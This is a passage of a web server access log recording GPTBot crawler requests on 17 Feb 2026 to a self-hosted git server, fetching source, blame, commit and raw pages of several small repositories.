2086] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate" -[17/Feb/2026:14:30:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/services/geminiService.ts" -[17/Feb/2026:14:30:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10722] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" -[17/Feb/2026:14:30:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj" [Client 74.7.227.38] [Length 9869] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj" -[17/Feb/2026:14:30:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/OpcConnectionTest.csproj" [Client 74.7.227.38] [Length 459] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/OpcConnectionTest.csproj" -[17/Feb/2026:14:30:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/Program.cs" [Client 74.7.227.38] [Length 9876] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/Program.cs" -[17/Feb/2026:14:30:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/global.json" [Client 74.7.227.38] [Length 10134] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/global.json" -[17/Feb/2026:14:30:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/global.json" [Client 74.7.227.38] [Length 9875] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/global.json" -[17/Feb/2026:14:30:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/OpcConnectionTest.csproj" [Client 74.7.227.38] [Length 9885] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/OpcConnectionTest.csproj" -[17/Feb/2026:14:30:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/OpcConnectionTest.csproj" [Client 74.7.227.38] [Length 10835] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/OpcConnectionTest.csproj" -[17/Feb/2026:14:30:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/Program.cs" [Client 74.7.227.38] [Length 6440] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/Program.cs" -[17/Feb/2026:14:30:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/Program.cs" [Client 74.7.227.38] [Length 18424] [Gzip 11.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/Program.cs" -[17/Feb/2026:14:30:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/global.json" [Client 74.7.227.38] [Length 43] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/global.json" -[17/Feb/2026:14:30:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.nuget.cache" [Client 74.7.227.38] [Length 12197] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj" -[17/Feb/2026:14:30:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/Program.cs?display=source" [Client 74.7.227.38] [Length 17693] [Gzip 6.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/Program.cs" -[17/Feb/2026:14:30:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/Program.cs?display=rendered" [Client 74.7.227.38] [Length 10907] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/Program.cs" -[17/Feb/2026:14:30:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.assets.json" [Client 74.7.227.38] [Length 37317] [Gzip 11.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj" -[17/Feb/2026:14:30:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10852] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" -[17/Feb/2026:14:30:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup" [Client 74.7.227.38] [Length 11444] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1" -[17/Feb/2026:14:30:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?files=html%2fassets" [Client 74.7.227.38] [Length 22236] [Gzip 4.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets" -[17/Feb/2026:14:30:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/types.ts?display=rendered" [Client 74.7.227.38] [Length 10869] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/types.ts" -[17/Feb/2026:14:30:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/.gitignore?display=source" [Client 74.7.227.38] [Length 11473] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/.gitignore" -[17/Feb/2026:14:30:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/types.ts?display=rendered" [Client 74.7.227.38] [Length 10872] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/types.ts" -[17/Feb/2026:14:30:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10869] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/.gitignore" -[17/Feb/2026:14:30:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.nuget.cache" [Client 74.7.227.38] [Length 11472] [Gzip 4.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.nuget.cache" -[17/Feb/2026:14:30:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.nuget.cache" [Client 74.7.227.38] [Length 9890] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.nuget.cache" -[17/Feb/2026:14:30:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.nuget.cache" [Client 74.7.227.38] [Length 3399] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.nuget.cache" -[17/Feb/2026:14:30:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.assets.json" [Client 74.7.227.38] [Length 49054] [Gzip 22.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.assets.json" -[17/Feb/2026:14:30:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.assets.json" [Client 74.7.227.38] [Length 9889] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.assets.json" -[17/Feb/2026:14:30:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html" [Client 74.7.227.38] [Length 14239] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup" -[17/Feb/2026:14:30:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/index.html" [Client 74.7.227.38] [Length 14392] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup" -[17/Feb/2026:14:30:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/update_status.py" [Client 74.7.227.38] [Length 13002] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup" -[17/Feb/2026:14:30:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup" [Client 74.7.227.38] [Length 9850] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup" -[17/Feb/2026:14:30:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 11898] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup" -[17/Feb/2026:14:30:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/status.json" [Client 74.7.227.38] [Length 11045] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup" -[17/Feb/2026:14:30:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.assets.json" [Client 74.7.227.38] [Length 53066] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.assets.json" -[17/Feb/2026:14:30:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest%2fobj%2fproject.nuget.cache" [Client 74.7.227.38] [Length 22646] [Gzip 4.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.nuget.cache" -[17/Feb/2026:14:30:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10872] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/.gitignore" -[17/Feb/2026:14:30:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/.gitignore?display=source" [Client 74.7.227.38] [Length 11474] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/.gitignore" -[17/Feb/2026:14:30:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/types.ts?display=rendered" [Client 74.7.227.38] [Length 10868] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/types.ts" -[17/Feb/2026:14:30:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 11651] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html" -[17/Feb/2026:14:30:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/index.html" [Client 74.7.227.38] [Length 9866] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/index.html" -[17/Feb/2026:14:30:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/types.ts" [Client 74.7.227.38] [Length 11522] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html" -[17/Feb/2026:14:30:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/README.md" [Client 74.7.227.38] [Length 11347] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html" -[17/Feb/2026:14:30:31 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html" -[17/Feb/2026:14:30:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/index.html" [Client 74.7.227.38] [Length 13284] [Gzip 6.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/index.html" -[17/Feb/2026:14:30:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/index.html" [Client 74.7.227.38] [Length 2884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/index.html" -[17/Feb/2026:14:30:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html" [Client 74.7.227.38] [Length 9860] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html" -[17/Feb/2026:14:30:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/services" [Client 74.7.227.38] [Length 9962] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html" -[17/Feb/2026:14:30:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets" [Client 74.7.227.38] [Length 10368] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html" -[17/Feb/2026:14:30:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 11497] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html" -[17/Feb/2026:14:30:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/index.tsx" -[17/Feb/2026:14:30:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/index.tsx" -[17/Feb/2026:14:30:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/types.ts" [Client 74.7.227.38] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/types.ts" -[17/Feb/2026:14:30:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/README.md" [Client 74.7.227.38] [Length 553] 